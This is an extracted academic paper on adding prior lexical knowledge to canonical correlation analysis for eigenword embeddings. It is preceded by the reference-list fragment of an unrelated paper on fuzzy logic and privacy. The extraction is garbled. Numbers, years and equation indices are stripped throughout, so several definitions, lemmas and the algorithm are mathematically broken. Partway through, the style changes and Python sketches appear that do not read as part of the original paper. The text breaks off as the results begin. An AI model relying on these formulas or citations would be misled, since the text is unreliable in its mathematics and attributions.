the ‘lectric law library. available at http://www.lectlaw.com/ files/int .htm. thrun s. . 
uci machine learning repository. available at https://archive.ics.uci.edu/ml/datasets/monk’s+problems. thrun sb, bala j, bloedorn e, bratko i, cestnik b, cheng j, de jong k, dzeroski s, fahlman se, fisher d, hamann r, kaufman k, keller s, kononenko i, kreuziger j, michalski rs, mitchell t, pachowicz pmreich y, vafaie h, van de welde w, wenzel w, wnek j, zhang j. . the monk’s problems: performance comparison of different learning algorithms. technical report cs-cmu- - . carnegie mellon university, pittsburgh. chamikara et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://in.mathworks.com/help/fuzzy/foundations-of-fuzzy-logic.html http://in.mathworks.com/help/fuzzy/foundations-of-fuzzy-logic.html http://dx.doi.org/ . / http://dx.doi.org/ . /widm. https://archive.ics.uci.edu/ml/datasets/balloons http://dx.doi.org/ . / . http://www.lectlaw.com/files/int .htm http://www.lectlaw.com/files/int .htm https://archive.ics.uci.edu/ml/datasets/monk's+problems http://dx.doi.org/ . /peerj-cs. witten ih, frank e, trigg l, hall m, holmes g, cunningham sj. . weka: practical machine learning tools and techniques with java implementations. available at http://www.cs.waikato.ac.nz/~ml/publications/ / ihw-ef-lt-mh-gh-sjc- tools-java.pdf (accessed june ). wolpert dh. . the lack of a priori distinctions between learning algorithms. neural computation : – doi . /neco. . . . . wu d, mendel jm. . aggregation using the linguistic weighted average and interval type- fuzzy sets. ieee transactions on fuzzy systems ( ): – doi . /tfuzz. . . yi x, rao fy, bertino e, bouguettaya a. . privacy preserving association rule min- ing in cloud computing. in: proceedings of the th acm symposium on information, computer and communications security. new york: acm, – . zadeh la. . toward a theory of fuzzy information granulation and its centrality in human reasoning and fuzzy logic. fuzzy sets and systems : – . chamikara et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://www.cs.waikato.ac.nz/~ml/publications/ / ihw-ef-lt-mh-gh-sjc-tools-java.pdf http://www.cs.waikato.ac.nz/~ml/publications/ / ihw-ef-lt-mh-gh-sjc-tools-java.pdf http://dx.doi.org/ . /neco. . . . http://dx.doi.org/ . /tfuzz. . http://dx.doi.org/ . /tfuzz. . http://dx.doi.org/ . /peerj-cs. encoding prior knowledge with eigenword embeddings dominique osborne department of mathematics and statistics university of strathclyde glasgow, g xh, uk dominique.osborne. @uni.strath.ac.uk shashi narayan and shay b. cohen school of informatics university of edinburgh edinburgh, eh le, uk {snaraya ,scohen}@inf.ed.ac.uk abstract canonical correlation analysis (cca) is a method for reducing the dimension of data represented using two views. it has been previously used to derive word embeddings, where one view indicates a word, and the other view indicates its context. we describe a way to incorporate prior knowledge into cca, give a theoretical justification for it, and test it by deriving word embeddings and evaluating them on a myriad of datasets. introduction in recent years there has been an immense in- terest in representing words as low-dimensional continuous real-vectors, namely word embeddings. word embeddings aim to capture lexico-semantic information such that regularities in the vocabulary are topologically represented in a euclidean space. 
such word embeddings have achieved state-of-the-art performance on many natural language processing (nlp) tasks, e.g., syntactic parsing (socher et al.), word or phrase similarity (mikolov et al., b), dependency parsing (bansal et al.), unsupervised learning (parikh et al.) and others. since the discovery that word embeddings are useful as features for various nlp tasks, research on word embeddings has taken on a life of its own, with a vibrant community searching for better word representations in a variety of problems and datasets. these word embeddings are often induced from large raw text capturing distributional co-occurrence information via neural networks (bengio et al.; mikolov et al., b; mikolov et al., c) or spectral methods (deerwester et al.; dhillon et al.). while these general purpose word embeddings have achieved significant improvement in various tasks in nlp, it has been discovered that further tuning of these continuous word representations for specific tasks improves their performance by a larger margin. for example, in dependency parsing, word embeddings can be tailored to capture similarity in terms of context within syntactic parses (bansal et al.), or they can be refined using semantic lexicons such as wordnet (miller), framenet (baker et al.) and the paraphrase database (ganitkevitch et al.) to improve various similarity tasks (yu and dredze; faruqui et al.; rothe and schütze). this paper proposes a method to encode prior semantic knowledge in spectral word embeddings (dhillon et al.). spectral learning algorithms are of great interest for their speed, scalability, theoretical guarantees and performance in various nlp applications. these algorithms are no strangers to word embeddings either. in latent semantic analysis (lsa; deerwester et al.; landauer et al.), word embeddings are learned by performing svd on the word-by-document matrix. recently, dhillon et al. have proposed to use canonical correlation analysis (cca) as a method to learn low-dimensional real vectors, called eigenwords. unlike lsa based methods, cca based methods are scale invariant and can capture multiview information such as the left and right contexts of the words. as a result, the eigenword embeddings of dhillon et al., although learned using simple linear methods, give accuracies comparable to or better than the state of the art when compared with highly non-linear deep learning based approaches (collobert and weston; mnih and hinton; mikolov et al., b; mikolov et al., c). the main contribution of this paper is a technique
it follows a sim- ilar idea to the one proposed by koren and carmel ( ) for improving the visualization of principal vectors with principal component analysis (pca). our derivation represents the solution to cca as that of an optimization problem which maximizes the distance between the two view projections of training examples, while weighting these distances using the external source of prior knowledge. as such, our approach applies to other uses of cca in the nlp literature, such as the one of jagarlamudi and daumé ( ), who used cca for translitera- tion, or the one of silberer et al. ( ), who used cca for semantically representing visual attributes. background and notation for an integer n, we denote by [n] the set of integers { , . . . ,n}. we assume the existence of a vocabu- lary of words, usually taken from a corpus. this set of words is denoted by h = {h , . . . ,h|h|}. for a square matrix a, we denote by diag(a) a diagonal matrix b which has the same dimensions as a such that bii = aii for all i. for vector v ∈ rd, we de- note its ` norm by ||v||, i.e. ||v|| = √∑d i= v i . we also denote by vj or [v]j the jth coordinate of v. for a pair of vectors u and v, we denote their dot product by 〈u,v〉. we define a word embedding as a function f from h to rm for some (relatively small) m. for exam- ple, in our experiments we vary m between and . the word embedding function maps the word to some real-vector representation, with the inten- tion to capture regularities in the vocabulary that are topologically represented in the corresponding eu- clidean space. for example, all vocabulary words that correspond to city names could be grouped to- gether in that space. research on the derivation of word embeddings that capture various regularities has greatly accel- erated in recent years. various methods used for this purpose range from low-rank approximations of co-occurrence statistics (deerwester et al., ; dhillon et al., ) to neural networks jointly learn- ing a language model (bengio et al., ; mikolov et al., a) or models for other nlp tasks (col- lobert and weston, ). canonical correlation analysis for deriving word embeddings one recent approach to derive word embeddings, developed by dhillon et al. ( ), is through the use of canonical correlation analysis, resulting in so- called “eigenwords.” cca is a technique for multi- view dimensionality reduction. it assumes the ex- istence of two views for a set of data, similarly to co-training (yarowsky, ; blum and mitchell, ), and then projects the data in the two views in a way that maximizes the correlation between the projected views. dhillon et al. ( ) used cca to derive word embeddings through the following procedure. they first break each document in a corpus of documents into n sequences of words of a fixed length k + , where k is a window size. for example, if k = , the short document “harry potter has been a best- seller” would be broken into “harry potter has been a” and “potter has been a best-seller.” in each such sequence, the middle word is identified as a pivot. this leads to the construction of the fol- lowing training set from a set of documents: {(w(i) , . . . ,w (i) k ,w (i),w (i) k+ , . . . ,w (i) k ) | i ∈ [n]}. with abuse of notation, this is a multiset, as cer- tain words are expected to appear in certain contexts multiple times. each w(i) is a pivot word, and the rest of the elements are words in the sequence called “the context words.” with this training set in mind, the two views for cca are defined as following. 
we define the first view through a sparse ''context matrix'' c ∈ r^(n × 2k|h|) such that each row in the matrix is a vector consisting of 2k one-hot vectors, each of length |h|. each such one-hot vector corresponds to a word that fired at a specific index in the context. (figure: the word and context views represented as matrices w and c. each row in w is a vector of length |h|, corresponding to a one-hot vector for the word in the example indexed by the row. each row in c is a vector of length 2k|h|, divided into 2k sub-vectors, each of length |h|; each such sub-vector is a one-hot vector for one of the 2k context words in the example indexed by the row.) in addition, we also define a second view through a matrix w ∈ r^(n × |h|) such that w_ij = 1 if w^(i) = h_j and 0 otherwise. we present both views of the training set in this figure. note that the matrix m = w⊤c is in r^(|h| × 2k|h|), and each element m_ij gives the count of times that h_i appeared with the corresponding context word and context index encoded by j. similarly, we define the diagonal matrices d1 = diag(w⊤w) and d2 = diag(c⊤c). finally, to get the word embeddings, we perform singular value decomposition (svd) on the matrix d1^(-1/2) m d2^(-1/2). note that in its original form, cca requires the use of w⊤w and c⊤c in their full form, and not just the corresponding diagonal matrices d1 and d2; however, in practice, inverting these full matrices can be quite intensive computationally and can lead to memory issues. as such, we approximate cca by using the diagonal matrices d1 and d2. from the svd step, we get two projections u ∈ r^(|h| × m) and v ∈ r^(2k|h| × m) such that d1^(-1/2) m d2^(-1/2) ≈ uΣv⊤, where Σ ∈ r^(m × m) is a diagonal matrix with Σ_ii > 0 being the ith largest singular value of d1^(-1/2) m d2^(-1/2). in order to get the final word embeddings, we calculate d1^(-1/2) u ∈ r^(|h| × m). each row in this matrix is an m-dimensional vector for the corresponding word in the vocabulary; this means that f(h_i) for h_i ∈ h is the ith row of the matrix d1^(-1/2) u. the projection v can be used to get ''context embeddings''; see dhillon et al. for more about this. this use of cca to derive word embeddings follows the usual distributional hypothesis (harris) that most word embedding techniques rely on. in the case of cca, this hypothesis is translated into action in the following way. cca finds projections for the contexts and for the pivot words which are most correlated. this means that if a word co-occurs in a specific context many times (either directly, or transitively through similarity to other words), then this context is expected to be projected to a point ''close'' to the point to which the word is projected. as such, if two words occur in a specific context many times, these two words are expected to be projected to points which are close to each other. for the next section, we denote x = w d1^(-1/2) and y = c d2^(-1/2). to refer to the dimensions of x and y generically, we denote d = |h| and d′ = 2k|h|. in addition, we refer to the column vectors of u and v as u_1, . . . , u_m and v_1, . . . , v_m.
mathematical intuition behind cca. the procedure that cca follows finds a projection of the two views in a shared space, such that the correlation between the two views is maximized at each coordinate, and there is minimal redundancy between the coordinates of each view.
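Before unpacking that optimization view, the pipeline just described can be sketched end-to-end on a toy corpus. This uses dense NumPy/SciPy arrays for clarity; a real implementation, such as the swell package the authors build on, keeps W and C sparse and never forms them explicitly, and all names below are illustrative.

```python
import numpy as np
from scipy.sparse.linalg import svds

def eigenwords(token_ids, vocab_size, k=2, m=50):
    """One-hot word view W and 2k-word context view C, then SVD of D1^{-1/2} M D2^{-1/2}."""
    n = len(token_ids) - 2 * k
    W = np.zeros((n, vocab_size))
    C = np.zeros((n, 2 * k * vocab_size))
    for i in range(n):
        window = token_ids[i:i + 2 * k + 1]
        pivot, context = window[k], window[:k] + window[k + 1:]
        W[i, pivot] = 1.0
        for slot, w in enumerate(context):
            C[i, slot * vocab_size + w] = 1.0

    M = W.T @ C                                   # co-occurrence counts
    d1 = np.maximum(np.diag(W.T @ W), 1e-12)      # diagonal of D1
    d2 = np.maximum(np.diag(C.T @ C), 1e-12)      # diagonal of D2
    A = (M / np.sqrt(d1)[:, None]) / np.sqrt(d2)[None, :]   # D1^{-1/2} M D2^{-1/2}

    U, S, Vt = svds(A, k=min(m, min(A.shape) - 1))
    return U / np.sqrt(d1)[:, None]               # rows are the embeddings D1^{-1/2} U

# Toy usage: a tiny corpus encoded as integer word ids.
corpus = [0, 1, 2, 3, 1, 2, 4, 1, 0, 2, 3, 4, 1, 2]
emb = eigenwords(corpus, vocab_size=5, k=1, m=3)
print(emb.shape)   # (5, 3): one row per vocabulary word
```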
this means that cca solves the following sequence of optimization prob- lems for j ∈ [m] where aj ∈ r ×d and bj ∈ r ×d ′ : arg max aj,bj corr(ajw >,bjc >) such that corr(ajw >,akw >) = , k < j corr(bjc >,bkc >) = , k < j where corr is a function that accepts two vectors and return the pearson correlation between the pair- wise elements of the two vectors. the approxi- mate solution to this optimization problem (when using diagonal d and d ) is â>i = d − / ui and b̂>i = d − / vi for i ∈ [m]. cca also has a probabilistic interpretation as a maximum likelihood solution of a latent variable model for two normal random vectors, each drawn based on a third latent gaussian vector (bach and jordan, ). the way we describe cca for deriving word embeddings is related to latent semantic indexing (lsi), which performs singular value decomposition on the matrix m directly, without doing any kind of variance normalization. dhillon et al. ( ) de- scribe some differences between lsi and cca. the extra normalization step decreases the importance of frequent words when doing svd. incorporating prior knowledge into canonical correlation analysis in this section, we detail the technique we use to incorporate prior knowledge into the derivation of canonical correlation analysis. the main motiva- tion behind our approach is to improve the opti- mization of correlation between the two views by weighing them using the external source of prior knowledge. the prior knowledge is based on lex- ical resources such as wordnet, framenet and the paraphrase database. our approach follows a sim- ilar idea to the one proposed by koren and carmel ( ) for improving the visualization of principal vectors with principal component analysis (pca). it is also related to laplacian manifold regularization (belkin et al., ). an important notion in our derivation is that of a laplacian matrix. the laplacian of an undirected weighted graph is an n × n matrix where n is the number of nodes in the graph. it equals d−a where a is the adjacency matrix of the graph (so that aij is the weight for the edge (i,j) in the graph, if it exists, and otherwise) and d is a diagonal matrix such that dii = ∑ j aij. the laplacian is always a sym- metric square matrix such that the sum over rows (or columns) is . it is also positive semi-definite. we propose a generalization of cca, in which we introduce a laplacian matrix into the derivation of cca itself, as shown in figure . we encode prior knowledge about the distances between the projec- tions of two views into the laplacian. the laplacian allows us to improve the optimization of the correla- tion between the two views by weighing them using the external source of prior knowledge. . generalization of cca we present three lemmas (proofs are given in ap- pendix a), followed by our main proposition. these three lemmas are useful to prove our final proposi- tion. the main proposition shows that cca maximizes the distance between the two view projections for any pair of examples i and j, i = j, while mini- mizing the two view projection distance for the two views of an example i. the two views we discuss here in practice are the view of the word through a one-hot representation, and the view which repre- sents the context words for a specific word token. the distance between two view projections is de- fined in eq. . lemma . let x and y be two matrices of size n×d and n × d′, respectively, for example, as defined in § . assume that ∑n i= xij = for j ∈ [d] and∑n i= yij = for j ∈ [d′]. 
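The lemma above is straightforward to confirm numerically: for column-centred views, the particular Laplacian with n−1 on the diagonal and −1 elsewhere equals n·I − 11⊤, so X⊤LY = n·X⊤Y. A quick sketch (an illustration, not part of the paper's proofs):

```python
import numpy as np

rng = np.random.default_rng(1)
n, d, d_prime = 200, 6, 9

# Column-centred views, as required by the lemma.
X = rng.normal(size=(n, d));        X -= X.mean(axis=0)
Y = rng.normal(size=(n, d_prime));  Y -= Y.mean(axis=0)

# Laplacian of the lemma: n-1 on the diagonal, -1 off the diagonal.
L = n * np.eye(n) - np.ones((n, n))

lhs = X.T @ L @ Y
rhs = n * (X.T @ Y)           # the positive constant turns out to be n
print(np.allclose(lhs, rhs))  # True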
let l be an n × n laplacian matrix such that lij = { n− if i = j − if i = j. ( ) then x>ly equals x>y up to a multiplication by a positive constant. lemma . let a ∈ rd×d′ . then the rank m thin- svd of a can be found by solving the following op- timization problem: max u , . . . ,um, v , . . . ,vm m∑ i= u>i avi such that ||ui|| = ||vi|| = i ∈ [m] 〈ui,uj〉 = 〈vi,vj〉 = i = j where ui ∈ rd× denote the left singular vectors, and vi ∈ rd ′× denote the right singular vectors. d n w n n l prior knowledge (optional) d′ n c diag w>w − d × w> × c × m diag c>c − d ≈ m d u × Σ × d′ mv > x> y figure : introducing prior knowledge in cca. w ∈ rn×d and c ∈ rn×d′ denote the word and context views respectively. l ∈ rn×n is a laplacian matrix encoded with the prior knowledge about the distances between the projections of w and c. the last utility lemma we describe shows that in- terjecting the laplacian between the two views can be expressed as a weighted sum of the distances be- tween the projections of the two views (these dis- tances are given in eq. ), where the weights come from the laplacian. lemma . let u , . . . ,um and v , . . . ,vm be two sets of vectors of length d and d′ respectively. let l ∈ rn×n be a laplacian and x ∈ rn×d and y ∈ rn×d ′ . then: m∑ k= (xuk) >l (y vk) = ∑ i,j −lij ( dmij ) , where dmij = √√√√ ( m∑ k= ([xuk]i − [y vk]j) ) . ( ) the following proposition is our main result for this section. proposition . the matrices u ∈ rd×m and v ∈ rd ′×m that cca computes are the m-dimensional projections that maximize ∑ i,j ( dmij ) −n n∑ i= (dmii ) , ( ) where dmij is defined as in eq. for u , . . . ,um being the columns of u and v , . . . ,vm being the columns of v . proof. according to lemma , the objective in eq. equals ∑m k= (xuk) >l(y vk) where l is defined as in eq. . therefore, maximizing eq. corresponds to maximization of ∑m k= (xuk) >l(y vk) under the constraints that the u and v matrices have orthonor- mal vectors. using lemma , it can be shown that the solution to this maximization is done by doing singular value decomposition on x>ly . accord- ing to lemma , this corresponds to finding u and v by doing singular value decomposition on x>y , because a multiplicative constant does not change the value of the right/left singular vectors. the above proposition shows that cca tries to find projections of both views such that the distances between the two views for pairs of examples with in- dices i = j are maximized (first term in eq. ), while minimizing the distance between the projections of the two views for a specific example (second term in eq. ). therefore, cca tries to project a context and a word in that context to points that are close to each other in a shared space, while maximizing the distance between a context and a word which do not often co-occur together. as long as l is a laplacian, proposition is still true, only with the maximization of the objective ∑ i,j −lij ( dmij ) , ( ) where lij ≤ for i = j and lii ≥ . this result lends itself to a generalization of cca, in which we use predefined weights for the laplacian that encode some prior knowledge about the distances that the projections of two views should satisfy. if the weight −lij is large for a specific (i,j), then we will try harder to maximize the distance be- tween one view of example i and the other view of example j (i.e. we will try to project the word w(i) and the context of example j into distant points in the space). 
this means that in the current formulation, −lij plays the role of a dissimiliarity indicator between pairs of words. the more dissimilar words are, the larger the weight, and then the more distant the pro- jections are for the contexts and the words. . from cca with dissimilarities to cca with similarities it is often more convenient to work with similarity measures between pairs of words. to do that, we can retain the same formulation as before with the laplacian, where −lij now denotes a measure of similarity. now, instead of maximizing the objective in eq. , we are required to minimize it. it can be shown that such mirror formulation can be done with an algorithm similar to cca, leading to a proposition in the style of proposition . to solve this minimization formulation, we just need to choose the singular vectors associated with the smallest m singular values (instead of the largest). once we change the cca algorithm with the laplacian to choose these projections, we can de- fine l, for example, based on a similarity graph. the graph is an undirected graph that has |h| nodes, for inputs: set of examples {(w(i) , . . . ,w (i) k ,w (i),w (i) k+ , . . . ,w (i) k ) | i ∈ [n]}, an integer m, an α ∈ ( , ], an undirected graph g over h, an integer n. data structures: a matrix m of size |h|× ( k|h|) (cross-covariance matrix), a matrix u corresponding to the word embed- dings algorithm: (cross-covariance estimation) ∀i,j ∈ [n] such that |i− j| ≤ n • if i = j, increase mrs by for r denoting the in- dex of word w(i) and for all s denoting the context indices of words w(i) , . . . ,w (i) k and w (i) k+ , . . . ,w (i) k . • if i = j and word w(i) is connected to word w(j) in g, increase mrs by α for r denoting the index of word w(i) and for all s denoting the context indices of words w(j) , . . . ,w (j) k and w (j) k+ , . . . ,w (j) k . • calculate d and d as specified in § . (singular value decomposition step) • perform singular value decomposition on d − / md − / to get a matrix u ∈ r|h|×m. (word embedding projection) • for each word hi for i ∈ [|h|] return the word em- bedding that corresponds with the ith row of u. figure : the cca-like algorithm that returns word em- beddings with prior knowledge encoded based on a simi- larity graph. each word in the vocabulary, and there is an edge be- tween a pair of words whenever the two words are similar to each other based on some external source of information, such as wordnet (for example, if they are synonyms). we then define the laplacian l such that lij = − if i and j are adjacent in the graph (and i = j), lii is the degree of the node i and lij = in all other cases. by using this variant of cca, we strive to maximize the distance of the two views between words which are adjacent in the graph (or continuing the example above, maximize the distance between words which are not synonyms). in addition, the fewer adjacent nodes a word has (or the more syn- onyms it has), the less important it is to minimize the distance between the two views of that given word. . final algorithm in order to use an arbitrary laplacian matrix with cca, we require that the data is centered, i.e. that the average over all examples of each of the coordi- nates of the word and context vectors is . however, such a prerequisite would make the matrices c and w dense (with many non-zero values), and hard to maintain in memory, and would also make singular value decomposition inefficient. 
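A compact reading of the boxed algorithm above, with a WordNet-style synonym graph supplying the prior edges, is sketched below. This is illustrative only — not the authors' modified swell implementation — and the graph, vocabulary and smoothing value are invented; the D1/D2 scaling and the SVD then proceed exactly as in the earlier pipeline.

```python
import numpy as np

def cooccurrence_with_prior(docs, vocab_size, k, alpha, graph, n_window=3):
    """Cross-covariance estimation in the style of the boxed algorithm: +1 for observed
    word/context pairs (i == j), and +alpha for the context of a nearby example j
    (|i - j| <= n_window) whose pivot is connected to the pivot of example i in the graph."""
    examples = []
    for doc in docs:
        for i in range(k, len(doc) - k):
            context = doc[i - k:i] + doc[i + 1:i + k + 1]
            examples.append((doc[i], context))

    M = np.zeros((vocab_size, 2 * k * vocab_size))
    for i, (pivot_i, context_i) in enumerate(examples):
        for slot, w in enumerate(context_i):                 # observed co-occurrences
            M[pivot_i, slot * vocab_size + w] += 1.0
        for j in range(max(0, i - n_window), min(len(examples), i + n_window + 1)):
            pivot_j, context_j = examples[j]
            if i != j and (pivot_i, pivot_j) in graph:       # prior-knowledge counts
                for slot, w in enumerate(context_j):
                    M[pivot_i, slot * vocab_size + w] += alpha
    return M

# Toy usage: six word ids; words 1 and 4 are "synonyms" in the prior graph.
graph = {(1, 4), (4, 1)}
docs = [[0, 1, 2, 3, 4, 5, 1, 2, 4, 3]]
M = cooccurrence_with_prior(docs, vocab_size=6, k=1, alpha=0.5, graph=graph)
print(M.shape)   # (6, 12); D1, D2 scaling and the SVD follow as before
```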
As just noted, centering would destroy sparsity; we therefore do not center the data, and instead use a matrix L which is not strictly a Laplacian but behaves better in practice. Given the graph mentioned above, which is extracted from an external source of information, we use L such that L_ij = 0 if i and j are not adjacent in the graph; L_ij = α if i ≠ j are adjacent, for an α ∈ (0, 1) which is treated as a smoothing factor for the graph (see below for the choices of α); and finally L_ii = 1 for all i ∈ [n]. This matrix is therefore symmetric, and the only constraint it does not satisfy is that of rows and columns summing to 0.

Scanning the documents and calculating the statistic matrix with the Laplacian is computationally infeasible with a large number of tokens given as input, since it is quadratic in that number. As such, we make another modification to the algorithm and calculate a "local" Laplacian. The modification requires an integer N as input (we use a fixed N in our experiments), and it then makes updates to pairs of word tokens only if they are within an N-sized window of each other. The final algorithm we use is described in the figure above. The algorithm works by directly computing the co-occurrence matrix M (instead of maintaining W and C). It does so by increasing by 1 any cells corresponding to a word-context co-occurrence in the documents, and by α any cells corresponding to words and contexts that are connected in the graph.

Experiments. In this section we describe our experiments.

Experimental setup. Training data: we used three datasets, which we refer to as the wiki corpora, based on increasingly large prefixes (in billions of words) of English Wikipedia. We downloaded the data from https://dumps.wikimedia.org/ and preprocessed it using the tool available at http://mattmahoney.net/dc/textdata.html. Each dataset is broken into fixed-length chunks (matching the window size), each corresponding to a document. The Laplacian L described above is calculated within each document separately; this means that −L_ij is nonzero only if i and j denote two words that appear in the same document. This is done to make the calculations computationally feasible. We calculate word embeddings only for the most frequent words in the corpus.

Prior knowledge resources: we consider three sources of prior knowledge: WordNet (Miller), the Paraphrase Database of Ganitkevitch et al., abbreviated as PPDB (we use the XL subset of PPDB), and FrameNet (Baker et al.). Since FrameNet and WordNet index words in their base form, we use WordNet's stemmer to identify the base form for the text in our corpora whenever we calculate the Laplacian graph. For WordNet, we have an edge in the graph if one word is a synonym, hypernym, or hyponym of the other. For PPDB, we have an edge if one word is a paraphrase of the other, according to the database. For FrameNet, we connect two words in the graph if they appear in the same frame.

System implementation: we modified the implementation of the swell Java package of Dhillon et al. (https://github.com/paramveerdhillon/swell). Specifically, we needed to modify the loop that iterates over words in each document into a nested loop that iterates over pairs of words, in order to compute a sum of the form Σ_ij x_ri L_ij y_js. Dhillon et al. use a fixed context window size k, which we retain in our experiments.
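For completeness, the remaining steps of the final algorithm (scaling by D1^(−1/2) and D2^(−1/2), then a truncated SVD whose left singular vectors give the embeddings) could look roughly as follows. This is a sketch under the assumption that D1 and D2 hold the row and column sums of M; the function and variable names are hypothetical and are not taken from the swell package.

```python
import numpy as np
from scipy.sparse import csr_matrix, diags
from scipy.sparse.linalg import svds

def embeddings_from_counts(M_dict, vocab_size, num_context_cols, m=50, eps=1e-12):
    """Turn the sparse count dictionary M into m-dimensional word embeddings."""
    items = list(M_dict.items())
    rows = [r for (r, c), v in items]
    cols = [c for (r, c), v in items]
    vals = [v for (r, c), v in items]
    M = csr_matrix((vals, (rows, cols)), shape=(vocab_size, num_context_cols))

    # D1 and D2 are assumed here to be the diagonal row/column sums of M.
    d1 = np.asarray(M.sum(axis=1)).ravel() + eps
    d2 = np.asarray(M.sum(axis=0)).ravel() + eps

    # Scale: D1^{-1/2} M D2^{-1/2}, kept sparse via diagonal matrices.
    S = diags(1.0 / np.sqrt(d1)) @ M @ diags(1.0 / np.sqrt(d2))

    # Truncated SVD; the left singular vectors are the word embeddings
    # (one row per vocabulary word).  m must be smaller than both dimensions.
    U, _, _ = svds(S, k=m)
    return U

# Continuing the toy example from the previous sketch
# (vocab_size=4, k=2 context slots per side -> 16 context columns):
# emb = embeddings_from_counts(M, vocab_size=4, num_context_cols=16, m=2)
```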
Our implementation and the word embeddings that we calculated are available at http://cohort.inf.ed.ac.uk/cohort/eigen/. We also use the square-root transformation as mentioned in Dhillon et al., which controls the variance in the counts accumulated from the corpus; see a justification for this transform in Stratos et al.

[Table: Results for the word similarity datasets, geographic analogies, and NP bracketing. Columns are grouped by task (word similarity average, geographic analogies, NP bracketing) and by prior-knowledge source; NPK stands for no prior knowledge (no retrofitting is used), WN for WordNet, PD for PPDB, and FN for FrameNet. The upper blocks (A-C) present the results with retrofitting; GloVe, skip-gram, global context, multilingual, and eigen are the word embeddings of Pennington et al., Mikolov et al., Huang et al., Faruqui and Dyer, and Dhillon et al., respectively. The middle blocks (D-F) show the results of our eigenword embeddings encoded with prior knowledge using our method (CCAPrior); each row in a block corresponds to a specific α value (smoothing factor), as described in the algorithm figure. In the lower blocks (G-I) we take the word embeddings from the middle blocks and retrofit them using the method of Faruqui et al. (CCAPrior+RF). Best results in each block are in bold.]

Baselines. Off-the-shelf word embeddings: we compare our word embeddings with existing state-of-the-art word embeddings, such as GloVe (Pennington et al.), skip-gram (Mikolov et al.), global context (Huang et al.), and multilingual (Faruqui and Dyer). We also compare our word embeddings with the eigenword embeddings of Dhillon et al. without any prior knowledge.

Retrofitting for prior knowledge: we compare our approach of incorporating prior knowledge into the derivation of CCA against previous work in which prior knowledge is introduced into off-the-shelf embeddings as a post-processing step (Faruqui et al.; Rothe and Schütze). In this paper, we focus on the retrofitting approach of Faruqui et al. Retrofitting works by optimizing an objective function with two terms: one that tries to keep the distances between the word vectors close to the original distances, and another that enforces the vectors of words which are adjacent in the prior-knowledge graph to be close to each other in the new embedding space. We use the retrofitting package (https://github.com/mfaruqui/retrofitting) to compare our results in different settings against the results of retrofitting of Faruqui et al.

Evaluation benchmarks. We evaluated the quality of our eigenword embeddings on three different tasks: word similarity, geographic analogies, and NP bracketing.

Word similarity: for the word similarity task we experimented with several widely used benchmarks. The WS-353-ALL dataset (Finkelstein et al.) consists of 353 pairs of English words with their human similarity ratings. Later, Agirre et al. re-annotated WS-353-ALL for similarity (WS-353-SIM) and relatedness (WS-353-REL), with specific distinctions between them.
The SimLex-999 dataset (Hill et al.) was built to measure how well models capture similarity, rather than relatedness or association. The MEN-TR-3000 dataset (Bruni et al.) consists of 3,000 word pairs sampled from words that occur frequently in a large web corpus. The MTurk-287 (Radinsky et al.) and MTurk-771 (Halawi et al.) datasets were scored by Amazon Mechanical Turk workers for relatedness of English word pairs. The YP-130 (Yang and Powers) and VERB-143 (Baker et al.) datasets were developed for verb similarity predictions. The last two datasets, MC-30 (Miller and Charles) and RG-65 (Rubenstein and Goodenough), consist of 30 and 65 noun pairs respectively.

For each dataset, we calculate the cosine similarity between the vectors of word pairs and measure Spearman's rank correlation coefficient between the scores produced by the embeddings and the human ratings. We report the average of the correlations over all datasets. Each word similarity task in the above list represents a different aspect of word similarity, and as such, averaging the results points to the quality of the word embeddings across several tasks. We later analyze specific datasets.

Geographic analogies: Mikolov et al. created a test set of analogous word pairs such as a:b c:d, raising analogy questions of the form "a is to b as c is to ___," where d is unknown. We report results on a subset of this dataset which focuses on finding capitals of common countries, e.g., Greece is to Athens as Iraq is to ___; the subset consists of country-capital word pairs. For a given question a:b c:d where d is unknown, we use the vector offset method (Mikolov et al.): we compute a vector v = v_b − v_a + v_c, where v_a, v_b, and v_c are the vector representations of the words a, b, and c respectively; we then return the word d with the greatest cosine similarity to v.

NP bracketing: here the goal is to identify the correct bracketing of a three-word noun phrase (Lazaridou et al.). For example, the bracketing of annual (price growth) is "right," while the bracketing of (entry level) machine is "left." Similarly to Faruqui and Dyer, we concatenate the word vectors of the three words and use this vector for binary classification into left or right.

Since most of the datasets that we evaluate on in this paper are not standardly separated into development and test sets, we report all results we calculated (with respect to hyperparameter differences) and do not select just a subset of the results.

Evaluation. Preliminary experiments: in our first set of experiments, we vary the dimension m of the word embedding vectors over several values. The results consistently improve as the dimension increases, for all the different datasets, and the more data are available, the more likely it is that a larger dimension will improve the quality of the word embeddings. The improvements with respect to the dimension are consistent across all of our results, so we fix m at the largest dimension we tried. We also noticed a consistent improvement in accuracy when using more data from Wikipedia, so we fix the dataset we use to be the largest wiki corpus.

Results: the table above describes the results from our first set of experiments.
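As an aside before turning to those results, the two scoring procedures used throughout this evaluation (Spearman correlation of cosine similarities against human ratings, and the vector-offset method for analogies) can be sketched as follows. This is a generic illustration rather than the authors' evaluation code; the embedding matrix, vocabulary mapping, and variable names are assumed for the example.

```python
import numpy as np
from scipy.stats import spearmanr

def cosine(u, v):
    return float(u @ v / (np.linalg.norm(u) * np.linalg.norm(v)))

def word_similarity_score(emb, word_to_id, pairs_with_ratings):
    """Spearman correlation between embedding similarities and human ratings.
    pairs_with_ratings: list of (word_a, word_b, human_score) tuples."""
    model_scores, human_scores = [], []
    for a, b, rating in pairs_with_ratings:
        if a in word_to_id and b in word_to_id:
            model_scores.append(cosine(emb[word_to_id[a]], emb[word_to_id[b]]))
            human_scores.append(rating)
    return spearmanr(model_scores, human_scores).correlation

def solve_analogy(emb, word_to_id, a, b, c):
    """Vector-offset method: return the word whose vector is most
    cosine-similar to v_b - v_a + v_c (excluding a, b, c themselves)."""
    v = emb[word_to_id[b]] - emb[word_to_id[a]] + emb[word_to_id[c]]
    best, best_sim = None, -np.inf
    for w, idx in word_to_id.items():
        if w in (a, b, c):
            continue
        sim = cosine(emb[idx], v)
        if sim > best_sim:
            best, best_sim = w, sim
    return best
```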
